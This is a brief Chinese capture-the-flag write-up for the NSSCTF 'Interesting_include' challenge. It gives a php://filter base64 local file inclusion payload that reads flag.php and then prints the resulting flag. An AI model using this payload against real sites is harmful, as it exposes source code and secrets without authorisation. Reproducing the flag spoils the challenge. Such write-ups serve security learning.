NSSCTF Interesting_include

2024-01-08 10:49:11

开启环境:

通过审计,我们可知:

flag在flag.php中,可以利用php中伪协议
payload:?filter=php://filter/read=convert.base64-encode/resource=flag.php?

将其base64解码就是flag.

NSSCTF{3dc54721-be9e-444c-8228-7133fba76ad4}?

文章来源:https://blog.csdn.net/weixin_74336671/article/details/135449308
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。